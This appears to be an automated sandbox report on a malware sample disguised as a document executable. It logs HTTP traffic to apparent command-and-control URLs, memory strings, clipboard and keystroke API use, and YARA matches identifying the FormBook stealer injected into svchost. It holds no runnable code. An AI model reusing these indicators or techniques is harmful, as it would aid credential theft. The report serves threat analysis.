Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:50:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 9a6dc7db-0394-4880-b691-abed2da91c16-1715158272server-timing: processing;dur=32content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNZurGMiBUjjH65nycq3vVVh8%2FaiQ%2BgU2QsjucWpF7EOlaV%2BJT8Op%2FVeQhkp6bXwWH9xT1Elgyj%2BTKfcIiXwaXnO1Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 2199823c-e987-4621-a11f-a61bbf44d90c-1715158274server-timing: processing;dur=16content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J67Qfkpny3Chmi2KspWsNPn9cvW3xVSbLp5U7FZUGZ4YTNkGZkCs%2Fi%2BlR0Dmw7MYTj1dU2jItIq69ISa5knhjWygjO0FLP0Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277server-timing: processing;dur=14content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPR7RGy7y0bvam6EnVKHqf1Xt1cFB5B79uPSZxcF4K%2B7HxOfcDKyxBWWzw4llHMJ36NBLAlqjS%2Bk%2BHCrxwN0RBzUDESnBData Raw: Data Ascii:

Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004BF6000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003956000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://donnavariedades.com/fo8o?FBEd=l
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 0000000A.00000003.1579551775.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 0000000A.00000003.1579551775.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 0000000A.00000003.1578336856.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHA
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004F1A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003C7A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?FBEd=mxnR
Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ
Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000045AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009BEAFF

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009BED6A

Source: C:\Users\user\Desktop\Document 151-512024.exe

0_2_009BEAFF

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_009AAA57

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_009D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Document 151-512024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Document 151-512024.exe, 00000000.00000000.1214181249.0000000000A02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d7e3c898-6
Source: Document 151-512024.exe, 00000000.00000000.1214181249.0000000000A02000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b0f267b4-2
Source: Document 151-512024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_869cadb2-2
Source: Document 151-512024.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bbaa9491-6

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Document 151-512024.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B60 NtClose,LdrInitializeThunk,	2_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,	2_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374340 NtSetContextThread,	2_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374650 NtSuspendThread,	2_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BA0 NtEnumerateValueKey,	2_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B80 NtQueryInformationFile,	2_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BF0 NtAllocateVirtualMemory,	2_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BE0 NtQueryValueKey,	2_2_03372BE0
